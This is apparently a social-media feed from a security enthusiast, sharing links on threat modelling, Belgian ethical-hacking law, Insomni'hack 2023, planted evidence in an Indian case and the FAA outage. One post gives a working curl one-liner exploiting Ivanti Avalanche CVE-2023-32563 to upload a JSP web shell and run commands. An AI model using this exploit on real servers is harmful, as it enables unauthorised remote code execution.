@starbuck3000

Did you read the terms and conditions?
#cyber #cybersecurity #privacy
Twitter: https://www.twitter.com/starbuck3000

So @trailofbits released a new threat modelling framework. I really like that, as all of the old existing 'reference' frameworks are so hard to apply in a way that brings any or much value to the process. Or I'm too dumb to do it :P.

Very exciting: https://blog.trailofbits.com/2025/02/28/threat-modeling-the-trail-of-bits-way/

#threatmodelling

Threat modeling the TRAIL of Bits way

In this blog, we’ll talk about our threat modeling process, TRAIL, which stands for Threat and Risk Analysis Informed Lifecycle. TRAIL enables us to trace and document the impact of flawed trust assumptions and insecure design decisions throughout each client’s system architecture and SDLC. Over time, multiple application security experts have refined TRAIL to provide maximal value for our clients and to minimize the effort required to update the threat model as the system changes.

The Trail of Bits Blog

Ivanti Avalanche CVE-2023-32563:

curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe

"The majority of violent crimes [in Sweden] are perpetrated by a small number of persistent violent offenders, typically males, characterized by early onset of violent criminality, substance abuse, personality disorders, and nonviolent criminality."

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3969807/

The 1 % of the population accountable for 63 % of all violent crime convictions

Population-based studies on violent crime and background factors may provide an understanding of the relationships between susceptibility factors and crime. We aimed to determine the distribution of violent crime convictions in the Swedish population ...

PubMed Central (PMC)

Belgium legalises ethical hacking in the original sense of its definition, and grants whistleblower status to "hackers" who disclose serious shortcomings even without having been invited to do so by the owner of the system/service.

Once again, the "world leader in innovation", which I will not name in full, gets overtaken...

https://www.law.kuleuven.be/citip/blog/belgium-legalises-ethical-hacking-a-threat-or-an-opportunity-for-cybersecurity/

I just installed the #Mastodon app on my phone (Android). When I click links, they seem to be opened in some sort of Chrome emulation. Did I miss the option to disable internal browsing?

The list of workshops (trainings) for Insomni’hack 2023 is now available and registration is open: https://insomnihack.ch/workshops-2023/

The number of seats is limited so register now, while they are still available! #INSO23 #INS23

Workshops 2023 - Insomni'hack

INDIA - Forensic analysis of the computer of a Jesuit priest accused of complicity in terrorism, who died during his imprisonment, supports the hypothesis that evidence was planted by a third party (forensic report available for download):
https://www.washingtonpost.com/world/2022/12/13/stan-swamy-hacked-bhima-koregaon/
Hackers planted evidence on computer of jailed Indian priest, report says

Father Stan Swamy died after spending more than eight months in jail on terrorism charges.

The Washington Post

Insomni’hack 2023’s talks schedule is now live: https://insomnihack.ch/talks-2023/

A few more talks (including both keynotes) will be announced soon. Stay tuned for further updates. #INS23 #INSO23

Talks 2023 - Insomni'hack

The outage that paralysed US airspace last Wednesday was reportedly caused by a corrupted database file (NOTAM). It is worth noting that the conclusion of the "Decision-makers" is to proceed with an overhaul of the service, which has been postponed for years.

https://edition.cnn.com/travel/article/faa-ground-stop-causes/index.html

A corrupt file led to the FAA ground stoppage. It was also found in the backup system

An FAA system outage caused massive delays and cancellations across the United States on Wednesday. Here's what happened, according to a source familiar with the Federal Aviation Administration operation.

CNN